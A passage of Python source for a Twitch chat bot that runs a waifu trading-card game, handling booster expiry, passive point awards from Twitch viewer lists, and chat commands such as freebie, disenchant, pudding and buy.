"SELECT boosters_opened.id, boosters_opened.userid, users.name FROM boosters_opened JOIN users ON boosters_opened.userid = users.id WHERE status = 'open' AND created <= %s",
[current_milli_time() - int(config["boosterTimeout"])])
packsToClose = cur.fetchall()
for pack in packsToClose:
userid = pack[1]
cur.execute("SELECT waifuid FROM boosters_cards WHERE boosterid = %s ORDER BY waifuid ASC",
[pack[0]])
cardIDs = [row[0] for row in cur.fetchall()]
cards = [getWaifuById(card) for card in cardIDs]
# keep the best cards
cards.sort(key=lambda waifu: -waifu['base_rarity'])
numKeep = int(min(max(handLimit(userid) - currentCards(userid), 0), len(cards)))
keeps = cards[:numKeep]
des = cards[numKeep:]
logger.info("Expired pack for user %s (%d): keeping %s, disenchanting %s", pack[2], userid,
str(keeps), str(des))
for waifu in keeps:
giveCard(userid, waifu['id'], waifu['base_rarity'])
gottenpoints = 0
for waifu in des:
baseValue = int(config["rarity" + str(waifu['base_rarity']) + "Value"])
profit = attemptBountyFill(self, waifu['id'])
gottenpoints += baseValue + profit
addPoints(userid, gottenpoints)
attemptPromotions(*cardIDs)
cur.execute("UPDATE boosters_opened SET status='closed', updated = %s WHERE id = %s",
[current_milli_time(), pack[0]])
# increase weightings
if int(config["last_weighting_update"]) < current_milli_time() - int(
config["weighting_increase_cycle"]):
logger.debug("Increasing card weightings...")
baseIncrease = float(config["weighting_increase_amount"])
cur.execute("UPDATE waifus SET normal_weighting = normal_weighting * %s WHERE base_rarity < %s",
[baseIncrease, int(config["strongerWeightingMinRarity"])])
cur.execute("UPDATE waifus SET normal_weighting = normal_weighting * %s WHERE base_rarity BETWEEN %s AND %s",
[baseIncrease**2, int(config["strongerWeightingMinRarity"]), int(config["numNormalRarities"])-1])
config["last_weighting_update"] = str(current_milli_time())
cur.execute("UPDATE config SET value = %s WHERE name = 'last_weighting_update'",
[config["last_weighting_update"]])
# pudding expiry?
now = datetime.datetime.now()
ymdNow = now.strftime("%Y-%m-%d")
if ymdNow > config["last_pudding_check"]:
logger.debug("Processing pudding expiry...")
config["last_pudding_check"] = ymdNow
cur.execute("UPDATE config SET value = %s WHERE name = 'last_pudding_check'", [ymdNow])
if now.day == 1:
# move pudding down a category, alert people with expiring pudding
cur.execute("UPDATE users SET puddingExpiring = puddingPrevious, puddingPrevious = puddingCurrent, puddingCurrent = 0")
cur.execute("SELECT name, puddingExpiring FROM users WHERE puddingExpiring > 0")
for userRow in cur.fetchall():
self.message("#%s" % userRow[0], "You have %d pudding expiring on the 8th of this month. !pudding to see your balance and to spend it." % userRow[1], True)
elif now.day == 8:
# actually expire pudding from 2 months ago
cur.execute("UPDATE users SET puddingExpiring = 0")
logger.debug("Checking live status of channels...")
checkAndRenewAppAccessToken()
with busyLock:
cur = db.cursor()
cur.execute("SELECT users.name, users.id FROM channels JOIN users ON channels.name = users.name")
rows = cur.fetchall()
cur.close()
channelids = []
idtoname = {}
isLive = {}
viewerCount = {}
for row in rows:
channelids.append(str(row[1]))
idtoname[str(row[1])] = row[0]
isLive[str(row[0])] = False
while len(channelids) > 0:
currentSlice = channelids[:100]
response = requests.get("https://api.twitch.tv/helix/streams", headers=headers,
params={"type": "live", "user_id": currentSlice})
data = response.json()["data"]
for element in data:
chanName = idtoname[str(element["user_id"])]
isLive[chanName] = True
logger.debug("%s is live!", idtoname[str(element["user_id"])])
viewerCount[chanName] = element["viewer_count"]
channelids = channelids[100:]
marathonLive = config['marathonChannel'][1:] in viewerCount
logger.debug("Catching all viewers...")
for c in self.addchannels:
self.mychannels.append(c)
self.addchannels = []
for c in self.leavechannels:
try:
self.mychannels.remove(c)
except Exception:
logger.warning("Couldn't remove channel %s from channels, it wasn't found. Channel list: %s",
str(c), str(self.mychannels))
self.leavechannels = []
try:
# print("Activitymap: " + str(activitymap))
doneusers = []
validactivity = []
for channel in self.channels:
# print("Fetching for channel " + str(channel))
channelName = str(channel).replace("#", "")
try:
a = []
if channelName in viewerCount and viewerCount[channelName] >= 800:
logger.debug("%s had more than 800 viewers, catching from chatters endpoint", channelName)
with urllib.request.urlopen(
'https://tmi.twitch.tv/group/user/' + channelName + '/chatters') as response:
data = json.loads(response.read().decode())
chatters = data["chatters"]
a = chatters["moderators"] + chatters["staff"] + chatters["admins"] + chatters[
"global_mods"] + chatters["viewers"]
else:
logger.debug("Users in %s: %s", channel, self.channels[channel]['users'])
for viewer in self.channels[channel]['users']:
a.append(viewer)
for viewer in a:
if viewer not in doneusers:
doneusers.append(viewer)
if isLive[channelName] and viewer not in validactivity:
validactivity.append(viewer)
except Exception:
logger.error("Error fetching chatters for %s, skipping their chat for this cycle" % channelName)
logger.error("Error: %s", str(sys.exc_info()))
# process all users
logger.debug("Caught users, giving points and creating accounts, amount to do = %d" % len(doneusers))
newUsers = []
maxPointsInactive = int(config["maxPointsInactive"])
overflowPoints = 0
while len(doneusers) > 0:
currentSlice = doneusers[:100]
with busyLock:
cur = db.cursor()
cur.execute("SELECT name, points, lastActiveTimestamp FROM users WHERE name IN(%s)" % ",".join(
["%s"] * len(currentSlice)), currentSlice)
foundUsersData = cur.fetchall()
cur.close()
foundUsers = [row[0] for row in foundUsersData]
newUsers += [user for user in currentSlice if user not in foundUsers]
if len(foundUsers) > 0:
updateData = []
for viewerInfo in foundUsersData:
pointGain = int(config["passivePoints"])
if viewerInfo[0] in activitymap and viewerInfo[0] in validactivity:
pointGain += max(10 - int(activitymap[viewerInfo[0]]), 0)
if viewerInfo[0] in marathonActivityMap and marathonActivityMap[viewerInfo[0]] < 10 and marathonLive:
altPointGain = int(config["passivePoints"]) + 10 - marathonActivityMap[viewerInfo[0]]
altPointGain = round(altPointGain * float(config["marathonPointsMultiplier"]))
pointGain = max(pointGain, altPointGain)
pointGain = int(pointGain * float(config["pointsMultiplier"]))
if viewerInfo[2] is None:
maxPointGain = max(maxPointsInactive - viewerInfo[1], 0)
if pointGain > maxPointGain:
overflowPoints += pointGain - maxPointGain
pointGain = maxPointGain
if pointGain > 0:
updateData.append((pointGain, viewerInfo[0]))
with busyLock:
cur = db.cursor()
cur.executemany("UPDATE users SET points = points + %s WHERE name = %s", updateData)
cur.close()
doneusers = doneusers[100:]
if overflowPoints > 0:
logger.debug("Paying %d overflow points to the bot account" % overflowPoints)
with busyLock:
cur = db.cursor()
cur.execute("UPDATE users SET points = points + %s WHERE name = %s",
[overflowPoints, config["username"]])
cur.close()
# now deal with user names that aren't already in the DB
if len(newUsers) > 10000:
logger.warning(
"DID YOU LET ME JOIN GDQ CHAT OR WHAT?!!? ... capping new user accounts at 10k. Sorry, bros!")
newUsers = newUsers[:10000]
while len(newUsers) > 0:
logger.debug("Adding new users...")
logger.debug("New users to add: %s", str(newUsers))
currentSlice = newUsers[:100]
r = requests.get("https://api.twitch.tv/helix/users", headers=headers,
params={"login": currentSlice})
if r.status_code == 429:
logger.warning("Rate Limit Exceeded! Skipping account creation!")
r.raise_for_status()
j = r.json()
if "data" not in j:
# error, what do?
r.raise_for_status()
currentIdMapping = {int(row["id"]): row["login"] for row in j["data"]}
logger.debug("currentIdMapping: %s", currentIdMapping)
foundIdsData = []
if len(currentIdMapping) > 0:
with busyLock:
cur = db.cursor()
cur.execute("SELECT id FROM users WHERE id IN(%s)" % ",".join(["%s"] * len(currentIdMapping)),
[id for id in currentIdMapping])
foundIdsData = cur.fetchall()
cur.close()
localIds = [row[0] for row in foundIdsData]
# users to update the names for (id already exists)
updateNames = [(currentIdMapping[id], id) for id in currentIdMapping if id in localIds]
if len(updateNames) > 0:
with busyLock:
logger.debug("Updating names...")
cur = db.cursor()
cur.executemany("UPDATE users SET name = %s WHERE id = %s", updateNames)
cur.close()
# new users (id does not exist)
newAccounts = [(id, currentIdMapping[id]) for id in currentIdMapping if id not in localIds]
if len(newAccounts) > 0:
with busyLock:
cur = db.cursor()
cur.executemany("INSERT INTO users (id, name, points, lastFree) VALUES(%s, %s, 0, 0)",
newAccounts)
cur.close()
# actually give points
updateData = []
for id in currentIdMapping:
viewer = currentIdMapping[id]
pointGain = int(config["passivePoints"])
if viewer in activitymap and viewer in validactivity:
pointGain += max(10 - int(activitymap[viewer]), 0)
if viewer in marathonActivityMap and marathonActivityMap[viewer] < 10 and marathonLive:
altPointGain = int(config["passivePoints"]) + 10 - marathonActivityMap[viewer]
altPointGain = round(altPointGain * float(config["marathonPointsMultiplier"]))
pointGain = max(pointGain, altPointGain)
pointGain = int(pointGain * float(config["pointsMultiplier"]))
updateData.append((pointGain, viewer))
with busyLock:
cur = db.cursor()
cur.executemany("UPDATE users SET points = points + %s WHERE name = %s", updateData)
cur.close()
# done with this slice
newUsers = newUsers[100:]
for user in activitymap:
activitymap[user] += 1
for user in marathonActivityMap:
marathonActivityMap[user] += 1
except Exception:
logger.warning("We had an error during passive point gain. skipping this cycle.")
logger.warning("Error: %s", str(sys.exc_info()))
logger.warning("Last run query: %s", cur._last_executed)
if self.autoupdate and booleanConfig("marathonBotFunctions"):
logger.debug("Updating Title and Game with horaro info")
schedule = getHoraro()
try:
data = schedule["data"]
ticker = data["ticker"]
current = ticker["current"]
wasNone = False
if current is None:
current = ticker["next"]
wasNone = True
current = current["data"]
game = current[0]
category = current[1]
runners = [getRawRunner(runner) for runner in current[2:6] if runner is not None]
args = {"game": game}
args["category"] = " (%s)" % category if category is not None else ""
args["comingup"] = "COMING UP: " if wasNone else ""
args["runners"] = (" by " + ", ".join(runners)) if len(runners) > 0 else ""
args["title"] = config["marathonTitle"]
args["command"] = config["marathonHelpCommand"]
title = "{comingup}{title} - {game}{category}{runners} - !{command} in chat".format(**args)
twitchGame = game
if len(current) >= 10 and current[-1] is not None:
twitchGame = current[-1]
updateBoth(twitchGame, title=title)
if len(runners) > 0:
thread.start_new_thread(MarathonBot.instance.updateFollowButtons, (runners,))
except Exception:
logger.warning("Error updating from Horaro. Skipping this cycle.")
logger.warning("Error: %s", str(sys.exc_info()))
if booleanConfig("marathonHelpAutopost"):
nextPost = int(config["marathonHelpAutopostLast"]) + int(config["marathonHelpAutopostPeriod"]) * 1000
if nextPost <= current_milli_time():
self.message(config["marathonChannel"], config["marathonHelpCommandText"], False)
config["marathonHelpAutopostLast"] = str(current_milli_time())
with busyLock:
with db.cursor() as cur:
cur.execute("UPDATE config SET value = %s WHERE name = 'marathonHelpAutopostLast'",
[config["marathonHelpAutopostLast"]])
if t is None:
timer()
def on_capability_twitch_tv_membership_available(self, nothing=None):
logger.debug("WE HAS TWITCH MEMBERSHIP AVAILABLE!")
return True
def on_capability_twitch_tv_membership_enabled(self, nothing=None):
logger.debug("WE HAS TWITCH MEMBERSHIP ENABLED!")
return
def on_capability_twitch_tv_tags_available(self, nothing=None):
logger.debug("WE HAS TAGS AVAILABLE!")
return True
def on_capability_twitch_tv_tags_enabled(self, nothing=None):
logger.debug("WE HAS TAGS ENABLED!")
return
def on_capability_twitch_tv_commands_available(self, nothing=None):
logger.debug("WE HAS COMMANDS AVAILABLE!")
return True
def on_capability_twitch_tv_commands_enabled(self, nothing=None):
logger.debug("WE HAS COMMANDS ENABLED!")
return
def on_disconnect(self, expected):
logger.error("Disconnected, reconnecting. Was it expected? %s", str(expected))
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=self.pw, reconnect=True)
def on_connect(self):
logger.info("Connected! joining channels...")
super().on_connect()
for channel in self.mychannels:
channel = channel.lower()
logger.debug("Joining %s...", channel)
self.join(channel)
def on_raw(self, message):
# print("Raw message: " + str(message))
super().on_raw(message)
def on_private_message(self, nick, message, tags):
super().on_private_message(nick, message)
return
def on_channel_message(self, target, nick, message, tags):
super().on_channel_message(target, nick, message)
return
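    # central message handler: tracks activity, counts emote-war emotes, creates/renames accounts
    # from the Twitch tags and dispatches !commands (blacklisted users only get a refusal)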
def on_message(self, source, target, message, tags, isWhisper=False):
if isWhisper:
logger.debug("whisper: %s, %s", str(target), message)
else:
logger.debug("message: %s, %s, %s", str(source), str(target), message)
# print("Tags: " + str(tags))
sender = str(target).lower()
channelowner = str(source).lower().replace("#", "")
# verify tags
# do nothing if twitch id is somehow missing
if 'user-id' not in tags:
return
# failsafe since display-name can (very rarely) be null for certain Twitch accounts
if 'display-name' not in tags or not tags['display-name']:
tags['display-name'] = sender
activeCommands = ["checkhand", "points", "freewaifu", "de", "disenchant", "buy", "booster", "trade", "lookup",
"alerts", "redeem", "upgrade", "search", "promote", "bet", "sets", "set", "giveaway",
"bounty", "emotewar", "wars", "war", "vote", "profile", "owners", "freebie", "godimage",
"freepacks", "freepack", "pudding"]
if sender not in blacklist and "bot" not in sender:
activitymap[sender] = 0
activitymap[channelowner] = 0
isMarathonChannel = source == config['marathonChannel'] and not isWhisper
if isMarathonChannel:
marathonActivityMap[sender] = 0
with busyLock:
with db.cursor() as cur:
# War?
if int(config["emoteWarStatus"]) == 1:
if sender not in self.emotecooldowns:
self.emotecooldowns[sender] = defaultdict(int)
for emote in emotewaremotes:
if emote in message and self.emotecooldowns[sender][emote] <= current_milli_time() - 60000:
cur.execute("UPDATE emoteWar SET `count` = `count` + 1 WHERE name = %s", [emote])
self.emotecooldowns[sender][emote] = current_milli_time()
cur.execute("SELECT name FROM users WHERE id = %s", [tags['user-id']])
user = cur.fetchone()
if user is None:
cur.execute("INSERT INTO users (id, name, points) VALUE (%s, %s, %s)",
[tags['user-id'], sender, 0])
logger.info("%s didn't have an account, created it.", tags['display-name'])
elif user[0] != sender:
logger.info("%s got a new name, changing it to: %s", user[0], sender)
cur.execute("UPDATE users SET name = %s WHERE id = %s", [sender, tags['user-id']])
if message.startswith("!"):
parts = message.split()
command = parts[0][1:].lower()
if command in activeCommands:
with busyLock:
with db.cursor() as cur:
cur.execute(
"UPDATE users SET lastActiveTimestamp = %s, lastActiveChannel = %s WHERE id = %s",
[current_milli_time(), "$$whisper$$" if isWhisper else source, tags['user-id']])
self.do_command(command, parts[1:], target, source, tags, isWhisper=isWhisper)
elif message.startswith("!") and message.split()[0][1:].lower() in activeCommands:
self.message(source, "Bad Bot. No. (account banned from playing TCG)", isWhisper)
return
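    # send a chat message: whispers are routed through #jtv with /w, normal messages are suppressed in silent mode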
def message(self, channel, message, isWhisper=False):
logger.debug("sending message %s %s %s" % (channel, message, "Y" if isWhisper else "N"))
if isWhisper:
super().message("#jtv", "/w " + str(channel).replace("#", "") + " " + str(message))
elif not silence:
super().message(channel, message)
else:
logger.debug("Message not sent as not Whisper and Silent Mode enabled")
def do_command(self, command, args, sender, channel, tags, isWhisper=False):
logger.debug("Got command: %s with arguments %s", command, str(args))
isMarathonChannel = channel == config['marathonChannel'] and not isWhisper
if command == "as" and debugMode and sender in superadmins:
if len(args) < 2 or len(args[1]) == 0:
self.message(channel, "Usage: !as <user> <command>", isWhisper)
return
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT id FROM users WHERE name = %s", [args[0]])
row = cur.fetchone()
if row is None:
self.message(channel, "User not found.")
return
userid = row[0]
self.do_command(args[1][1:].lower(), args[2:], args[0].lower(), channel,
{'display-name': args[0], 'user-id': userid, 'badges': []}, isWhisper)
return
with busyLock:
if command == config["marathonHelpCommand"] and isMarathonChannel:
self.message(channel, config["marathonHelpCommandText"], isWhisper)
return
if command == "quit" and sender in superadmins:
logger.info("Quitting from admin command.")
pool.disconnect(client=self, expected=True)
# sys.exit(0)
return
if command == "checkhand":
# print("Checking hand for " + sender)
cards = getHand(tags['user-id'])
if len(cards) == 0:
self.message(channel,
"%s, you don't have any waifus! Get your first with !freebie" % tags[
'display-name'], isWhisper=isWhisper)
return
currentData = currentCards(tags['user-id'], True)
limit = handLimit(tags['user-id'])
dropLink = "%s/hand?user=%s" % (config["siteHost"], sender)
msgArgs = {"user": tags['display-name'], "limit": limit, "curr": currentData['hand'],
"bounties": currentData['bounties'], "link": dropLink}
# verbose mode if it's a whisper or they request it
if len(args) > 0 and args[0].lower() == "verbose":
if isWhisper or followsme(tags['user-id']):
whisperChannel = "#%s" % sender
if currentData['bounties'] > 0:
self.message(whisperChannel,
"{user}, you have {curr} waifus, {bounties} bounties and {limit} total spaces. {link}".format(
**msgArgs), True)
else:
self.message(whisperChannel,
"{user}, you have {curr} waifus and {limit} total spaces. {link}".format(
**msgArgs), True)
messages = ["Your current hand is: "]
for row in cards:
row['amount'] = "(x%d)" % row['amount'] if row['amount'] > 1 else ""
waifumsg = getWaifuRepresentationString(row['id'], cardrarity=row[
'rarity']) + ' from {series} - {image}{amount}; '.format(**row)
if len(messages[-1]) + len(waifumsg) > 400:
messages.append(waifumsg)
else:
messages[-1] += waifumsg
for message in messages:
self.message(whisperChannel, message, True)
elif not isWhisper:
self.message(channel,
"%s, to use verbose checkhand, follow the bot! Follow it and try again." %
tags['display-name'])
else:
if currentData['bounties'] > 0:
self.message(channel,
"{user}, you have {curr} waifus, {bounties} bounties and {limit} total spaces. {link}".format(
**msgArgs), isWhisper)
else:
self.message(channel,
"{user}, you have {curr} waifus and {limit} total spaces. {link}".format(
**msgArgs), isWhisper)
return
if command == "points":
with db.cursor() as cur:
cur.execute("SELECT points FROM users WHERE id = %s", [tags['user-id']])
points = cur.fetchone()[0]
pudding = sum(getPuddingBalance(tags['user-id']))
self.message(channel, "%s, you have %d points and %d pudding!" % (tags['display-name'], points, pudding), isWhisper)
return
if command == "pudding":
subcmd = "" if len(args) < 1 else args[0].lower()
if subcmd == "booster":
if len(args) < 2:
self.message(channel, "Usage: !pudding booster <name>", isWhisper)
return
# check that the pack is actually buyable
truename = boostername = args[1].lower()
mega = False
if boostername.startswith("mega"):
truename = boostername[4:]
mega = True
with db.cursor() as cur:
cur.execute("SELECT name, cost, canMega FROM boosters WHERE name = %s AND buyable = 1", [truename])
booster = cur.fetchone()
if booster is None or (mega and booster[2] == 0):
self.message(channel, "Invalid booster specified.", isWhisper)
return
# can they actually open it?
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you have an open booster already! !booster show to check it." %
tags['display-name'], isWhisper)
return
cost = math.ceil(int(booster[1])/int(config["puddingExchangeRate"]))*(5 if mega else 1)
if not hasPudding(tags['user-id'], cost):
self.message(channel, "%s, you can't afford a %s booster. They cost %d pudding." % (tags['display-name'], boostername, cost), isWhisper)
return
takePudding(tags['user-id'], cost)
try:
openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, truename, False, mega)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
self.message(channel, "%s, you open a %s booster for %d pudding: %s/booster?user=%s" % (tags['display-name'], boostername, cost, config["siteHost"], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % booster[0]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error processing your booster, please try again later.",
isWhisper)
return
elif subcmd == "list":
with db.cursor() as cur:
cur.execute("SELECT name, cost FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
boosters = cur.fetchall()
boosterInfo = ", ".join("%s / %d pudding" % (row[0], math.ceil(int(row[1])/int(config["puddingExchangeRate"]))) for row in boosters)
self.message(channel, "Current buyable packs: %s. !pudding booster <name> to buy a booster with pudding." % boosterInfo, isWhisper)
else:
# base: show pudding balance broken down
pudding = getPuddingBalance(tags['user-id'])
if sum(pudding) == 0:
self.message(channel, "%s, you don't currently have any pudding. You can earn some by participating in bets or completing sets." % tags['display-name'], isWhisper)
else:
msgArgs = (tags['display-name'], sum(pudding), pudding[0], pudding[1], pudding[2])
self.message(channel, "%s, you have %d total pudding: %d earned this month, %d earned last month, %d expiring soon. !pudding list to see what boosters you can buy, !pudding booster <name> to buy a booster with pudding." % msgArgs, isWhisper)
return
if command == "freewaifu" or command == "freebie":
# print("Checking free waifu egliability for " + str(sender))
with db.cursor() as cur:
cur.execute("SELECT lastFree, rewardSeqSeed, rewardSeqIndex FROM users WHERE id = %s", [tags['user-id']])
res = cur.fetchone()
nextFree = 79200000 + int(res[0])
if nextFree > current_milli_time():
a = datetime.timedelta(milliseconds=int(nextFree - current_milli_time()), microseconds=0)
datestring = "{0}".format(a).split(".")[0]
self.message(channel,
str(tags[
'display-name']) + ", you need to wait {0} for your next free drop!".format(
datestring), isWhisper=isWhisper)
return
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'", [tags['user-id']])
hasPack = cur.fetchone()[0] > 0
spaceInHand = currentCards(tags['user-id']) < handLimit(tags['user-id'])
freeData = getRewardsMetadata()
seed = res[1]
index = res[2]
if seed is None or index >= freeData[0]:
seed = generateRewardsSeed(*freeData)
index = 0
# retrieve their reward for this time
generator = random.Random(seed)
seq = [x for x in range(freeData[0])]
generator.shuffle(seq)
rewardNum = seq[index]
if rewardNum >= freeData[1]:
# not good reward
lookup = [0, rewardNum - freeData[1]]
else:
# good
lookup = [1, rewardNum]
cur.execute("SELECT points, waifuid, waifu_rarity, boostername FROM free_rewards WHERE `is_good` = %s AND `index` = %s", lookup)
rewardInfo = cur.fetchone()
if rewardInfo is None:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
# only one of the latter three rewards is allowed to be filled in, and there needs to be at least one reward.
cardRewardCount = sum([(1 if rewardInfo[n] is not None else 0) for n in range(1, 4)])
ovrRewardCount = sum([(1 if rewardInfo[n] is not None else 0) for n in range(4)])
if cardRewardCount > 1 or ovrRewardCount == 0:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
# can they take the reward at the current time?
if (rewardInfo[1] is not None or rewardInfo[2] is not None) and hasPack and not spaceInHand:
self.message(channel, "%s, your hand is full and you have a booster open!" % tags['display-name'], isWhisper)
return
# if we made it this far they can receive it. process it
if rewardInfo[0] is not None:
addPoints(tags['user-id'], rewardInfo[0])
if cardRewardCount == 0:
self.message(channel, "%s, you got your daily free reward: %d points!" % (tags['display-name'], rewardInfo[0]), isWhisper)
pointsPrefix = ("%d points and " % rewardInfo[0]) if rewardInfo[0] is not None else ""
if rewardInfo[1] is not None or rewardInfo[2] is not None:
if rewardInfo[1] is not None:
wid = rewardInfo[1]
else:
wid = dropCard(rarity=rewardInfo[2], bannedCards=getUniqueCards(tags['user-id']))
row = getWaifuById(wid)
recordPullMetrics(row['id'])
logDrop(str(tags['user-id']), row['id'], row['base_rarity'], "freebie", channel, isWhisper)
if row['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
threading.Thread(target=sendDrawAlert, args=(channel, row, str(tags["display-name"]))).start()
if not spaceInHand:
cur.execute(
"INSERT INTO boosters_opened (userid, boostername, paid, created, status) VALUES(%s, 'freebie', 0, %s, 'open')",
[tags['user-id'], current_milli_time()])
boosterid = cur.lastrowid
cur.execute("INSERT INTO boosters_cards (boosterid, waifuid) VALUES(%s, %s)",
[boosterid, row['id']])
else:
giveCard(tags['user-id'], row['id'], row['base_rarity'])
attemptPromotions(row['id'])
droplink = config["siteHost"] + "/booster?user=" + sender
msgArgs = {"username": tags['display-name'], "id": row['id'],
"rarity": config["rarity%dName" % row['base_rarity']],
"name": row['name'], "series": row['series'],
"link": row['image'] if spaceInHand else "",
"pack": " ( %s )" % droplink if not spaceInHand else "",
"points": pointsPrefix}
self.message(channel, "{username}, you got your daily free reward: {points}[{id}][{rarity}] {name} from {series} - {link}{pack}".format(**msgArgs), isWhisper)
if rewardInfo[3] is not None:
if hasPack:
# send the pack to freepacks
giveFreeBooster(tags['user-id'], rewardInfo[3])
self.message(channel, "%s, you got your daily free reward: %sa %s booster (sent to !freepacks)" % (tags['display-name'], pointsPrefix, rewardInfo[3]), isWhisper)
else:
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, rewardInfo[3], False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
self.message(channel, "%s, you got your daily free reward: %sa %s booster - %s/booster?user=%s" % (tags['display-name'], pointsPrefix, rewardInfo[3], config['siteHost'], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
cur.execute("UPDATE users SET lastFree = %s, rewardSeqSeed = %s, rewardSeqIndex = %s WHERE id = %s", [current_milli_time(), seed, index + 1, tags['user-id']])
return
if command == "disenchant" or command == "de":
if len(args) == 0 or (len(args) == 1 and len(args[0]) == 0):
self.message(channel, "Usage: !disenchant <list of IDs>", isWhisper=isWhisper)
return
# check for confirmation
hasConfirmed = False
if args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
disenchants = []
dontHave = []
hand = getHand(tags['user-id'])
disenchantingSpecial = False
godRarity = int(config["numNormalRarities"]) - 1
for arg in args:
# handle disenchanting
try:
deTarget = parseHandCardSpecifier(hand, arg)
if deTarget in disenchants:
self.message(channel, "You can't disenchant the same waifu twice at once!", isWhisper)
return
if deTarget['rarity'] >= int(config["numNormalRarities"]) and not hasConfirmed:
self.message(channel,
"%s, you are trying to disenchant one or more special waifus! Special waifus do not take up any hand space and disenchant for 0 points. If you are sure you want to do this, append \" yes\" to the end of your command." %
tags['display-name'], isWhisper)
return
if deTarget['rarity'] >= int(
config["disenchantRequireConfirmationRarity"]) and not hasConfirmed:
confirmRarityName = config["rarity%sName" % config["disenchantRequireConfirmationRarity"]]
self.message(channel,
"%s, you are trying to disenchant one or more waifus of %s rarity or higher! If you are sure you want to do this, append \" yes\" to the end of your command." % (
tags['display-name'], confirmRarityName), isWhisper)
return
if deTarget['rarity'] != deTarget['base_rarity'] and not hasConfirmed:
self.message(channel,
"%s, you are trying to disenchant one or more promoted waifus! If you are sure you want to do this, append \" yes\" to the end of your command." %
tags['display-name'], isWhisper)
return
disenchants.append(deTarget)
except CardNotInHandException:
dontHave.append(arg)
except AmbiguousRarityException:
self.message(channel,
"You have more than one rarity of waifu %s in your hand. Please specify a rarity as well by appending a hyphen and then the rarity e.g. !disenchant %s-god" % (
arg, arg), isWhisper)
return
except ValueError:
self.message(channel, "Could not decipher one or more of the waifu IDs you provided.",
isWhisper)
return
if len(dontHave) > 0:
if len(dontHave) == 1:
self.message(channel, "You don't own waifu %s." % dontHave[0], isWhisper)
else:
self.message(channel,
"You don't own the following waifus: %s" % ", ".join([id for id in dontHave]),
isWhisper)
return
# handle disenchants appropriately
pointsGain = 0
ordersFilled = 0
checkPromos = []
for row in disenchants:
if row['id'] not in checkPromos:
checkPromos.append(row['id'])
takeCard(tags['user-id'], row['id'], row['rarity'])
if row['base_rarity'] >= int(config["numNormalRarities"]):
disenchantingSpecial = True
baseValue = int(config["rarity" + str(row['rarity']) + "Value"])
profit = attemptBountyFill(self, row['id'])
pointsGain += baseValue + profit
if profit > 0:
ordersFilled += 1
elif row['rarity'] >= int(config["disenchantAlertMinimumRarity"]):
# valuable waifu disenchanted
waifuData = getWaifuById(row['id'])
waifuData['base_rarity'] = row['rarity'] # cheat to make it show any promoted rarity override
threading.Thread(target=sendDisenchantAlert,
args=(channel, waifuData, tags["display-name"])).start()
if row['rarity'] == godRarity:
# check image change
with db.cursor() as cur:
cur.execute("UPDATE godimage_requests SET state='cancelled' WHERE requesterid = %s AND waifuid = %s AND state = 'pending'", [tags['user-id'], row['id']])
if cur.rowcount > 0:
# request was cancelled
waifuData = getWaifuById(row['id'])
self.message("#%s" % sender, "Your image change request for [%d] %s was cancelled since you disenchanted it." % (row['id'], waifuData['name']), True)
addPoints(tags['user-id'], pointsGain)
attemptPromotions(*checkPromos)
if disenchantingSpecial:
checkFavouriteValidity(tags['user-id'])
if len(disenchants) == 1:
buytext = " (bounty filled)" if ordersFilled > 0 else ""
self.message(channel, "Successfully disenchanted waifu %d%s. %s gained %d points" % (
disenchants[0]['id'], buytext, str(tags['display-name']), pointsGain), isWhisper=isWhisper)
else:
buytext = " (%d bounties filled)" % ordersFilled if ordersFilled > 0 else ""
self.message(channel,
"Successfully disenchanted %d waifus%s. Added %d points to %s's account" % (
len(disenchants), buytext, pointsGain, str(tags['display-name'])),
isWhisper=isWhisper)
return
if command == "giveme":
self.message(channel, "No.", isWhisper=isWhisper)
return
if command == "buy":
if len(args) != 1:
if len(args) > 0 and args[0].lower() == "booster":
self.message(channel, "%s, did you mean !booster buy?" % tags['display-name'], isWhisper)
else:
self.message(channel, "Usage: !buy <rarity> (So !buy uncommon for an uncommon)",
isWhisper=isWhisper)
return
if currentCards(tags['user-id']) >= handLimit(tags['user-id']):
self.message(channel,
"{sender}, you have too many cards to buy one! !disenchant some or upgrade your hand!".format(
sender=str(tags['display-name'])), isWhisper=isWhisper)
return
try:
rarity = parseRarity(args[0])
except Exception:
self.message(channel, "Unknown rarity. Usage: !buy <rarity> (So !buy uncommon for an uncommon)",
isWhisper=isWhisper)
return
if rarity >= int(config["numNormalRarities"]) or int(config["rarity" + str(rarity) + "Max"]) == 1:
self.message(channel, "You can't buy that rarity of waifu.", isWhisper=isWhisper)
return
price = int(config["rarity" + str(rarity) + "Value"]) * 5
if not hasPoints(tags['user-id'], price):
self.message(channel, "You do not have enough points to buy a " + str(
config["rarity" + str(rarity) + "Name"]) + " waifu. You need " + str(price) + " points.",
isWhisper=isWhisper)
return
chosenWaifu = dropCard(rarity=rarity, allowDowngrades=False,
